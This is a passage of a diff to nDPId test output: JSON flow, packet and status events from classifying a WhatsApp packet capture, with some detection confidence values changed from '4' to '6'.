+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033850395,"flow_last_seen":1655033850680,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655033850680,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40204,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":58,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":58,"packets-processed":57,"total-skipped-flows":0,"total-l4-payload-len":3413,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":7,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":41,"global_ts_msec":1655034332550} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655034332550,"flow_last_seen":1655034332550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655034332550,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45932,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1655034332550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655034332550,"pkt":"eJS0JASgYDjgxTWgCABFAAA8s3tAAD8GTsbAqAJkszzDMbNsFGaY2PgHAAAAAKAC\/\/+CVAAAAgQFtAQCCArFiW3yAAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1655034332580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655034332580,"pkt":"eJS0JASgYDjgxTWgCABFAAA0s3xAAD8GTs3AqAJkszzDMbNsFGaY2PgILoO694AQAKylowAAAQEICsWJbhFxU6\/V"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1655034332651,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655034332651,"pkt":"eJS0JASgYDjgxTWgCABFAAA4s31AAD8GTsjAqAJkszzDMbNsFGaY2PgILoO694AYAKxgDAAAAQEICsWJbldxU6\/VRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655034332550,"flow_last_seen":1655034332681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1655034332681,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45932,"dst_port":5222,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655034332550,"flow_last_seen":1655034332681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1655034332681,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45932,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":66,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":66,"packets-processed":65,"total-skipped-flows":0,"total-l4-payload-len":3741,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":8,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1655036863658} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655036863658,"flow_last_seen":1655036863658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655036863658,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1655036863658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655036863658,"pkt":"eJS0JASgYDjgxTWgCABFAAA8VU1AAD8GrPTAqAJkszzDMZ\/6FGZJAAaOAAAAAKAC\/\/\/gngAAAgQFtAQCCAo3avKLAAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1655036863694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655036863694,"pkt":"eJS0JASgYDjgxTWgCABFAAA0VU5AAD8GrPvAqAJkszzDMZ\/6FGZJAAaPQBkrQIAQAIAuZAAAAQEICjdq8tim3M31"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1655036863777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655036863777,"pkt":"eJS0JASgYDjgxTWgCABFAAA4VU9AAD8GrPbAqAJkszzDMZ\/6FGZJAAaPQBkrQIAYAIDovgAAAQEICjdq8yym3M31RUQAAQ=="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655036863658,"flow_last_seen":1655036863823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655036863823,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40954,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655036863658,"flow_last_seen":1655036863823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655036863823,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40954,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":74,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":74,"packets-processed":73,"total-skipped-flows":0,"total-l4-payload-len":4075,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":9,"total-active-flows":9,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":53,"global_ts_msec":1655037784969} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655037784969,"flow_last_seen":1655037784969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655037784969,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41214,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1655037784969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655037784969,"pkt":"eJS0JASgYDjgxTWgCABFAAA8eZJAAD8GiK\/AqAJkszzDMaD+FGaPGwMEAAAAAKAC\/\/\/PkAAAAgQFtAQCCAo3eL\/2AAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1655037785024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655037785024,"pkt":"eJS0JASgYDjgxTWgCABFAAA0eZNAAD8GiLbAqAJkszzDMaD+FGaPGwMFTC+Ch4AQAIA0RwAAAQEICjd4wGKeH1xF"} 
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1655037785072,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655037785072,"pkt":"eJS0JASgYDjgxTWgCABFAAA4eZRAAD8GiLHAqAJkszzDMaD+FGaPGwMFTC+Ch4AYAIDu7QAAAQEICjd4wGqeH1xFRUQAAQ=="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655037784969,"flow_last_seen":1655037785114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655037785114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41214,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655037784969,"flow_last_seen":1655037785114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655037785114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41214,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655037943346,"flow_last_seen":1655037943346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655037943346,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":49026,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1655037943346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655037943346,"pkt":"eJS0JASgYDjgxTWgCABFAAA8ZIBAAD8GndHAqAJkszzDIb+CFGZJeEW8AAAAAKAC\/\/\/DuQAAAgQFtAQCCApZCY6zAAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1655037943378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655037943378,"pkt":"eJS0JASgYDjgxTWgCABFAAA0ZIFAAD8GndjAqAJkszzDIb+CFGZJeEW9lbThyYAQAKz4BQAAAQEIClkJjtOTiu6c"} 
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1655037943378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655037943378,"pkt":"eJS0JASgYDjgxTWgCABFAAA4ZIJAAD8GndPAqAJkszzDIb+CFGZJeEW9lbThyYAYAKyyswAAAQEIClkJjtSTiu6cRUQAAQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655037943346,"flow_last_seen":1655037943383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655037943383,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":49026,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655037943346,"flow_last_seen":1655037943383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655037943383,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":49026,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":90,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":90,"packets-processed":89,"total-skipped-flows":0,"total-l4-payload-len":6885,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":11,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":11,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1655038737650} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655038737650,"flow_last_seen":1655038737650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655038737650,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41288,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1655038737650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655038737650,"pkt":"eJS0JASgYDjgxTWgCABFAAA8+jpAAD8GCAfAqAJkszzDMaFIFGaFGhCGAAAAAKAC\/\/9PGwAAAgQFtAQCCAo3gTyYAAAAAAEDAwk="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1655038737824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655038737824,"pkt":"eJS0JASgYDjgxTWgCABFAAA0+jtAAD8GCA7AqAJkszzDMaFIFGaFGhCH4E9fBoAQAIAQ0gAAAQEICjeBPUjxtjrK"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1655038738001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655038738001,"pkt":"eJS0JASgYDjgxTWgCABFAAA4+jxAAD8GCAnAqAJkszzDMaFIFGaFGhCH4E9fBoAYAIDK4wAAAQEICjeBPeXxtjrKRUQAAQ=="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655038737650,"flow_last_seen":1655038738036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655038738036,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41288,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":98,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1655030801747,"flow_last_seen":1655030802079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":1537,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1655038738381,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":44804,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655038737650,"flow_last_seen":1655038738036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655038738036,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41288,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":98,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1655030801747,"flow_last_seen":1655030802079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":1537,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1655038738381,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":44804,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":98,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":98,"packets-processed":97,"total-skipped-flows":0,"total-l4-payload-len":7219,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":12,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":1655041569928} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655041569928,"flow_last_seen":1655041569928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655041569928,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1655041569928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655041569928,"pkt":"eJS0JASgYDjgxTWgCABFAAA8yNhAAD8GOWnAqAJkszzDMaKKFGb8FC6CAAAAAKAC\/\/\/RUwAAAgQFtAQCCAo3qCQAAAAAAAEDAwk="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1655041569964,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655041569964,"pkt":"eJS0JASgYDjgxTWgCABFAAA0yNlAAD8GOXDAqAJkszzDMaKKFGb8FC6DekSzAYAQAIDQKAAAAQEICjeoJCQj994H"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1655041570092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655041570092,"pkt":"eJS0JASgYDjgxTWgCABFAAA4yNpAAD8GOWvAqAJkszzDMaKKFGb8FC6DekSzAYAYAICKaAAAAQEICjeoJJMj994HRUQAAQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655041569928,"flow_last_seen":1655041570160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655041570160,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41610,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033797377,"flow_last_seen":1655033797657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42646,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655031983762,"flow_last_seen":1655031984056,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033482376,"flow_last_seen":1655033482899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40178,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
